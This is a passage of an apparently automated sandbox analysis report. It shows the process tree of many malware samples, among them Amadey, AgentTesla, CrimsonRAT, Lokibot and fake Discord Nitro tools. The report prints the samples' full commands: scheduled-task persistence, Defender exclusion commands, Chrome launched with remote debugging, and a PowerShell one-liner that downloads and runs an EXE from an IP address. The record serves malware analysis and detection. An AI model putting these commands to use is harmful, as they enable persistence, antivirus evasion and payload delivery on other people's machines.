      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6292
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tfjlc9giuyED.bat" "
      4⤵
      PID:4480
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:280
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7228
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:10164
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8632
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5vHrygAPe57m.bat" "
        6⤵
        
        PID:8252
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:7860
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4960
- C:\Users\Admin\AppData\Local\Temp\amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
  2⤵
  PID:3896
- - C:\ProgramData\a5410c88f1\bween.exe
    "C:\ProgramData\a5410c88f1\bween.exe"
    3⤵
    PID:6404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
      4⤵
      PID:304
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
        5⤵
        
        PID:6236
- C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
  "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
  2⤵
  PID:6132
- C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
  "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
  2⤵
  PID:1568
- - C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
    "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
    3⤵
    PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\setup-26030252553.exe
      C:\Users\Admin\AppData\Local\Temp\\setup-26030252553.exe
      4⤵
      PID:5836
- C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
  2⤵
  PID:3340
- - C:\ProgramData\Hdlharas\dlrarhsiva.exe
    "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
    3⤵
    PID:876
- C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
  "C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 224
    3⤵
    - Program crash
    PID:4580
- C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
  "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
  2⤵
  PID:4404
- - C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
    "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
    3⤵
    PID:5148
- C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
  "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
  2⤵
  PID:4848
- - C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
    "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
    3⤵
    PID:5080
- C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
  2⤵
  PID:1912
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:12248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp4BF3.tmp.bat""
    3⤵
    PID:12516
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:8932
  - - C:\Users\Admin\AppData\Roaming\Minecraft.exe
      "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
      4⤵
      PID:13508
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
  2⤵
  PID:5376
- C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
  "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
  2⤵
  PID:1216
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
    3⤵
    PID:6452
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
    3⤵
    PID:464
- C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
  "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
  2⤵
  PID:2792
- - C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
    "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
    3⤵
    PID:9504
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  PID:2196
- - C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
    3⤵
    PID:948
  - - C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe
      "C:\Users\Admin\AppData\Local\Temp\a\g354ff43hj67.exe"
      4⤵
      PID:7748
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        5⤵
        
        PID:8768
      - C:\Windows\system32\mode.com
        
        mode 65,10
        6⤵
        
        PID:10364
      - C:\Users\Admin\AppData\Local\Temp\main\7z.exe
        
        7z.exe e file.zip -p1697420900235384164176743894 -oextracted
        6⤵
        
        PID:7528
  - - C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe
      "C:\Users\Admin\AppData\Local\Temp\a\jajajdva.exe"
      4⤵
      PID:7508
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        5⤵
        
        PID:7444
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        6⤵
        Uses browser remote debugging
        
        PID:8392
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa91b8dcf8,0x7ffa91b8dd04,0x7ffa91b8dd10
        7⤵
        
        PID:8436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1768,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2552 /prefetch:3
        7⤵
        
        PID:9140
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2468,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2464 /prefetch:2
        7⤵
        
        PID:9116
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2092,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2624 /prefetch:8
        7⤵
        
        PID:9108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3172 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:8268
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3192,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3224 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:8284
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4304,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4256 /prefetch:2
        7⤵
        Uses browser remote debugging
        
        PID:7964
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,2161991379504323782,14217822792739966473,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4724 /prefetch:1
        7⤵
        Uses browser remote debugging
        
        PID:7176
  - - C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
      "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
      4⤵
      PID:7188
    - - C:\Users\Admin\AppData\Local\Temp\a\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\crypted.exe"
        5⤵
        
        PID:8196
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"' & exit
        6⤵
        
        PID:6496
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "dJ3H492fymd.exe" /tr '"C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe"'
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command " $action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Temp\TkEsyhMyLtSDFBh\dJ3H492fymd.exe.exe' $trigger = New-ScheduledTaskTrigger -AtLogOn Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'dJ3H492fymd.exe-1570' -RunLevel Highest "
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8948
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 800
        5⤵
        Program crash
        
        PID:8580
  - - C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe"
      4⤵
      PID:7644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\PhotoshopSetup.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9580
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PhotoshopSetup.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10676
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\AggregatorHostsss'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AggregatorHostsss'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9436
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AggregatorHostsss" /tr "C:\Users\Admin\AppData\Roaming\AggregatorHostsss"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:13116
  - - C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Adobe_PhotoshopSetups.exe"
      4⤵
      PID:8652
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RtkAudUService64.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9304
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2726.tmp.bat""
        5⤵
        
        PID:10272
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:7960
  - - C:\Users\Admin\AppData\Local\Temp\a\system.exe
      "C:\Users\Admin\AppData\Local\Temp\a\system.exe"
      4⤵
      PID:7428
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\system.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8208
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9240
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'WindowsSessionUpdate'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4084
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WindowsSessionUpdate" /tr "C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:12984
  - - C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
      "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
      4⤵
      PID:9396
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:9592
    - - C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\sCIPrhZt5Yub9qL.exe"
        5⤵
        
        PID:5348
  - - C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ChromeUpdate.exe"
      4⤵
      PID:9644
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9644 -s 964
        5⤵
        Program crash
        
        PID:3564
  - - C:\Users\Admin\AppData\Local\Temp\a\loader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\loader.exe"
      4⤵
      PID:10812
  - - C:\Users\Admin\AppData\Local\Temp\a\01.exe
      "C:\Users\Admin\AppData\Local\Temp\a\01.exe"
      4⤵
      PID:10324
    - - C:\Windows\system32\taskkill.exe
        
        "taskkill" /f /im pcidrv.exe
        5⤵
        Kills process with taskkill
        
        PID:10588
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Users\Admin\Drivers\busdrv.exe /sc minute /mo 1 /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:10612
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Users\Admin\Drivers\busdrv.exe /sc onstart /ru SYSTEM /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8384
    - - C:\Users\Admin\Drivers\busdrv.exe
        
        "C:\Users\Admin\Drivers\busdrv.exe"
        5⤵
        
        PID:6516
      - C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe
        
        "C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe"
        6⤵
        
        PID:8256
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\MnCPLj3GUe7a.exe /sc minute /mo 1 /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11240
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\MnCPLj3GUe7a.exe /sc onstart /ru SYSTEM /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8960
        
        C:\Drivers\MnCPLj3GUe7a.exe
        
        "C:\Drivers\MnCPLj3GUe7a.exe"
        7⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\download_dfaafbee649a66f8.exe
        7⤵
        
        PID:6296
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        8⤵
        Delays execution with timeout.exe
        
        PID:8372
    - - C:\Windows\system32\cmd.exe
        
        "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\a\01.exe
        5⤵
        
        PID:7256
      - C:\Windows\system32\timeout.exe
        
        timeout /t 2
        6⤵
        Delays execution with timeout.exe
        
        PID:7668
  - - C:\Users\Admin\AppData\Local\Temp\a\ori.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
      4⤵
      PID:7184
  - - C:\Users\Admin\AppData\Local\Temp\a\we.exe
      "C:\Users\Admin\AppData\Local\Temp\a\we.exe"
      4⤵
      PID:1472
  - - C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
      "C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
      4⤵
      PID:7716
    - - C:\Windows\TEMP\{2DF2633F-CAF2-430C-97E9-BD50B98E0239}\.cr\xmsn.exe
        
        "C:\Windows\TEMP\{2DF2633F-CAF2-430C-97E9-BD50B98E0239}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=596 -burn.filehandle.self=592
        5⤵
        
        PID:10648
      - C:\Windows\TEMP\{B5B20FCE-A768-4E5C-BC1E-503282B5BB0E}\.ba\msn.exe
        
        C:\Windows\TEMP\{B5B20FCE-A768-4E5C-BC1E-503282B5BB0E}\.ba\msn.exe
        6⤵
        
        PID:8276
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        7⤵
        
        PID:14064
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        
        PID:8040
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        9⤵
        
        PID:12580
  - - C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
      4⤵
      PID:9116
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11668
  - - C:\Users\Admin\AppData\Local\Temp\a\random.exe
      "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
      4⤵
      PID:11616
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn XhWEBmaPjDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        
        PID:11712
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn XhWEBmaPjDE /tr "mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:12392
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\R7Sj9HpLl.hta
        5⤵
        
        PID:11716
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'NWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12008
        
        C:\Users\Admin\AppData\Local\TempNWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE
        
        "C:\Users\Admin\AppData\Local\TempNWXTRRUFIOVCDPZS41FI8P5TYBDR3UET.EXE"
        7⤵
        
        PID:10612
  - - C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Build104.exe"
      4⤵
      PID:11952
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    PID:1800
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      PID:1028
    - - C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
        5⤵
        
        PID:7788
      - C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe"
        6⤵
        
        PID:8904
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\roblox_protected.exe"
        6⤵
        
        PID:11024
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        7⤵
        
        PID:10348
    - - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
        5⤵
        
        PID:3100
    - - C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
        5⤵
        
        PID:9872
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:11084
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp27F1.tmp.bat""
        6⤵
        
        PID:7292
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:1612
    - - C:\Users\Admin\AppData\Local\Temp\a\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
        5⤵
        
        PID:3564
    - - C:\Users\Admin\AppData\Local\Temp\a\rem.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
        5⤵
        
        PID:9016
    - - C:\Users\Admin\AppData\Local\Temp\a\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\apple.exe"
        5⤵
        
        PID:7380
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        6⤵
        
        PID:11148
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5A31.tmp\5A32.tmp\5A33.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        7⤵
        
        PID:10712
    - - C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe"
        5⤵
        
        PID:7988
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
